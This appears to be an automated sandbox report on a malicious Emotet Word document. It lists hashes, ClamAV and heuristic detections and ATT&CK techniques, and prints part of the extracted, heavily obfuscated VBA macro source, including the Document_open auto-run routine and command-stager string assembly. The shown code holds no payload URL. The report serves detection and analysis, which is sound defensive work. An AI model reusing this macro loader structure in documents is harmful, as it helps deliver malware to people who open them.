Emotet Office (OLE) malware analysis — malicious · 30414941a8d8e2a2

MALICIOUS

Office (OLE)

207.8 KB Created: 2019-12-19 06:45:00 Authoring application: Microsoft Office Word First seen: 2020-05-25

MD5: b97abb20baf6743c7669bde4171cae40 SHA-1: d4a5152d72b80b93e8c2d4f053149be3798e9ab6 SHA-256: 30414941a8d8e2a28dd8e62cad6e5780b0677eeb2e6629a8bd3f71c014045f25

302 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains VBA macros, including a Document_Open macro and a hidden-property command stager, which are indicative of Emotet malware. The ClamAV detection explicitly names Emotet. The macro's obfuscated nature and use of CreateObject and GetObject suggest it is designed to download and execute a second-stage payload.

Heuristics 8

ClamAV: Doc.Downloader.Emotet-7465225-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-7465225-0
VBA macros detected medium 5 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER

VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
GetObject call high OLE_VBA_GETOBJ

GetObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 13647 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	13647 bytes
SHA-256: `8448570783b482355bb2ba6658abaae578280447a24811ee2623a3f78e8197f6`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Mxvhbduvaman" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Control = "Txystuopctf, 0, 0, MSForms, TextBox" Private Sub Document_open() Mcmezirzle = "Autem." Dim Xzgrbdrhv As Double Dim Oaxczkfvqy As Integer Alccymuaiaaoh = ("Aut deserunt unde.") Dim Qmdgqfryebgr As Double Dim Jwhaafgya As Integer Dim Agcnajvippin As Double Timxbsvfu = Soglormkm Dim Pkerkjzraiqsh As Boolean Azbzumcjhvpx = ("Ut.") Dim Wdfrutbtjhlgd As Integer Dim Cvznvqnjmvmmb As String Dim Vlztdfkbmdrhp As Boolean Oidnfaqjegj = "Dolorem labore ut facilis." Dim Wihzxomahjvp As String Dim Mjdjxpzhdioq As Integer Dim Bumumsfdw As String Bgngzixogd = ("Et nemo.") Dim Wldtofyl As Boolean Hymwadyoinmz = 557 Maezrcpbbt = Izqyxgdizo Htprunow = 783 Pryvjnjxfcbgq Czwewqwsu = "Accusamus voluptates quis quia." Dim Uysohauilh As Double Dim Jwxhobssdbs As Boolean Uzcssvddxcnxf = ("Soluta voluptas voluptas.") Dim Xxuzkjniy As Boolean Dim Qblfsgorm As Boolean Dim Qtmpmlukjikk As Integer Hstnhrdjk = Srkhjoeg Dim Bnuwcnoyz As Double Pzknudejogj = ("Nulla.") Dim Ttkdaugeqzg As Double Dim Rfdokkykcszto As String Dim Xqasfgcidlyfa As Double Aeiwmzfavyjdr = "Earl" Dim Jljghaynar As Double Dim Acmexxdruksyz As Integer Dim Etvclhtbmwt As Boolean Crieydfxiulfn = ("Maxime repellat sed.") Dim Ztlgpktuepc As String Baietepdc = 832 Wmrvyjwyxccsl = Oiwdpwoywim Ivmwfljdsx = 825 End Sub Attribute VB_Name = "Bxxiwjdrz" Attribute VB_Base = "0{39A0656F-35F6-4270-A556-C76A3D36ABF4}{BE9C00E4-ED20-4F49-B983-E34C02E4FB76}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Jneeyenvp" Function Jcehcnue() Ensdgeoyv = "Whitney" Dim Awkyyahd As String Dim Ebttmtpdwld As Integer Miivefrshuk = ("Temporibus dicta libero nam.") Dim Azxvgzctam As String Dim Ukyuzyxghy As Integer Dim Fdxsvxhjgdt As Double Aeervlvkl = Sxhvmgbcigqd Dim Ydfodrrioy As Integer Plmvfttczxpl = ("Voluptas in tempora.") Dim Brhzjachxipvi As String Dim Kjibtrqp As Double Dim Wkykantq As Integer Abootqhnefk = "Hannah" Dim Zpngkdik As Integer Dim Ynqdxwuweecd As Double Dim Thckckiqljzu As Integer Invfyiqbd = ("Temporibus rem culpa.") Dim Rkjfgywgtm As Integer Xhrkhbgd = 909 Mnrjxeberd = Lazlfldo Fmxxhxiaxjgh = 833 Ncwneqgiqyxj = Mxvhbduvaman.Txystuopctf Rindwbmxq = "Aspernatur et repellendus." Dim Irilvnuyibepp As Boolean Dim Ohlldzcnjkqp As Integer Grrhraxv = ("Et numquam enim iste.") Dim Ojmpgmtykcmfl As String Dim Xgeybfxmxcj As Double Dim Xswthoxtm As Boolean Wqrfgoagn = Utwyrrxpnwzm Dim Fsxwhuksxckn As Double Ibdandxdw = ("Sunt et quos at ut placeat eos.") Dim Fvxzkxermavdj As String Dim Kbwundys As Integer Dim Tzywvcvnab As String Tnefvffmxtt = "Est architecto veritatis reprehenderit." Dim Vhcvshdpoqxg As String Dim Xaqjebxiipih As Integer Dim Vnzfldzvtr As Integer Vxfwgzbohmhk = ("Officiis facere asperiores corporis vel impedit ut ut.") Dim Vmymnkoqta As String Urrbgyckfzdm = 458 Geejgpqzin = Ewffeffoe Ffihegwiledej = 397 Wnjexnaezdjpp = Ncwneqgiqyxj + Bxxiwjdrz.Ilgeerriroqje + Bxxiwjdrz.Mhtyuxfg + Bxxiwjdrz.Fnxfrqfjld Mmlugsclu = "Penny" Dim Plwgetihtoq As Double Dim Xdcclnqhlndql As Boolean Fscoaoxqlp = ("Ipsa facere sed reiciendis inventore neque veniam voluptatem autem.") Dim Oqqrwmmwdqzz As Boolean Dim Fextqsowcbl As Integer Dim Kamqmtsbqvvhd As String Ioschkitt = Zgsoogtnbwrzn Dim Ooiblmsgnnj As Boolean Ocgtynuljcgp = ("Omnis enim soluta deserunt itaque velit consequatur quos.") Dim Ylrofxtwtkr As String Dim Gaeafxzzzq As Double Dim Zldelcly As Integer Uvyelbsiwbrc = "Eaque provident distinctio debitis." Dim Fcasorzvun As String Dim Prhifiolgi As Boolean Dim Mxgqtwkx As Boolean Zj ... (truncated)

SHA-256: 8448570783b482355bb2ba6658abaae578280447a24811ee2623a3f78e8197f6

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "Mxvhbduvaman"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Txystuopctf, 0, 0, MSForms, TextBox"
Private Sub Document_open()
   Mcmezirzle = "Autem."
Dim Xzgrbdrhv As Double
Dim Oaxczkfvqy As Integer
Alccymuaiaaoh = ("Aut deserunt unde.")
Dim Qmdgqfryebgr As Double
Dim Jwhaafgya As Integer
Dim Agcnajvippin As Double
Timxbsvfu = Soglormkm
Dim Pkerkjzraiqsh As Boolean
Azbzumcjhvpx = ("Ut.")
Dim Wdfrutbtjhlgd As Integer
Dim Cvznvqnjmvmmb As String
Dim Vlztdfkbmdrhp As Boolean
Oidnfaqjegj = "Dolorem labore ut facilis."
Dim Wihzxomahjvp As String
Dim Mjdjxpzhdioq As Integer
Dim Bumumsfdw As String
Bgngzixogd = ("Et nemo.")
Dim Wldtofyl As Boolean
Hymwadyoinmz = 557
Maezrcpbbt = Izqyxgdizo
Htprunow = 783
Pryvjnjxfcbgq
   Czwewqwsu = "Accusamus voluptates quis quia."
Dim Uysohauilh As Double
Dim Jwxhobssdbs As Boolean
Uzcssvddxcnxf = ("Soluta voluptas voluptas.")
Dim Xxuzkjniy As Boolean
Dim Qblfsgorm As Boolean
Dim Qtmpmlukjikk As Integer
Hstnhrdjk = Srkhjoeg
Dim Bnuwcnoyz As Double
Pzknudejogj = ("Nulla.")
Dim Ttkdaugeqzg As Double
Dim Rfdokkykcszto As String
Dim Xqasfgcidlyfa As Double
Aeiwmzfavyjdr = "Earl"
Dim Jljghaynar As Double
Dim Acmexxdruksyz As Integer
Dim Etvclhtbmwt As Boolean
Crieydfxiulfn = ("Maxime repellat sed.")
Dim Ztlgpktuepc As String
Baietepdc = 832
Wmrvyjwyxccsl = Oiwdpwoywim
Ivmwfljdsx = 825
End Sub

Attribute VB_Name = "Bxxiwjdrz"
Attribute VB_Base = "0{39A0656F-35F6-4270-A556-C76A3D36ABF4}{BE9C00E4-ED20-4F49-B983-E34C02E4FB76}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Jneeyenvp"
Function Jcehcnue()
   Ensdgeoyv = "Whitney"
Dim Awkyyahd As String
Dim Ebttmtpdwld As Integer
Miivefrshuk = ("Temporibus dicta libero nam.")
Dim Azxvgzctam As String
Dim Ukyuzyxghy As Integer
Dim Fdxsvxhjgdt As Double
Aeervlvkl = Sxhvmgbcigqd
Dim Ydfodrrioy As Integer
Plmvfttczxpl = ("Voluptas in tempora.")
Dim Brhzjachxipvi As String
Dim Kjibtrqp As Double
Dim Wkykantq As Integer
Abootqhnefk = "Hannah"
Dim Zpngkdik As Integer
Dim Ynqdxwuweecd As Double
Dim Thckckiqljzu As Integer
Invfyiqbd = ("Temporibus rem culpa.")
Dim Rkjfgywgtm As Integer
Xhrkhbgd = 909
Mnrjxeberd = Lazlfldo
Fmxxhxiaxjgh = 833
Ncwneqgiqyxj = Mxvhbduvaman.Txystuopctf
   Rindwbmxq = "Aspernatur et repellendus."
Dim Irilvnuyibepp As Boolean
Dim Ohlldzcnjkqp As Integer
Grrhraxv = ("Et numquam enim iste.")
Dim Ojmpgmtykcmfl As String
Dim Xgeybfxmxcj As Double
Dim Xswthoxtm As Boolean
Wqrfgoagn = Utwyrrxpnwzm
Dim Fsxwhuksxckn As Double
Ibdandxdw = ("Sunt et quos at ut placeat eos.")
Dim Fvxzkxermavdj As String
Dim Kbwundys As Integer
Dim Tzywvcvnab As String
Tnefvffmxtt = "Est architecto veritatis reprehenderit."
Dim Vhcvshdpoqxg As String
Dim Xaqjebxiipih As Integer
Dim Vnzfldzvtr As Integer
Vxfwgzbohmhk = ("Officiis facere asperiores corporis vel impedit ut ut.")
Dim Vmymnkoqta As String
Urrbgyckfzdm = 458
Geejgpqzin = Ewffeffoe
Ffihegwiledej = 397
Wnjexnaezdjpp = Ncwneqgiqyxj + Bxxiwjdrz.Ilgeerriroqje + Bxxiwjdrz.Mhtyuxfg + Bxxiwjdrz.Fnxfrqfjld
   Mmlugsclu = "Penny"
Dim Plwgetihtoq As Double
Dim Xdcclnqhlndql As Boolean
Fscoaoxqlp = ("Ipsa facere sed reiciendis inventore neque veniam voluptatem autem.")
Dim Oqqrwmmwdqzz As Boolean
Dim Fextqsowcbl As Integer
Dim Kamqmtsbqvvhd As String
Ioschkitt = Zgsoogtnbwrzn
Dim Ooiblmsgnnj As Boolean
Ocgtynuljcgp = ("Omnis enim soluta deserunt itaque velit consequatur quos.")
Dim Ylrofxtwtkr As String
Dim Gaeafxzzzq As Double
Dim Zldelcly As Integer
Uvyelbsiwbrc = "Eaque provident distinctio debitis."
Dim Fcasorzvun As String
Dim Prhifiolgi As Boolean
Dim Mxgqtwkx As Boolean
Zj
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.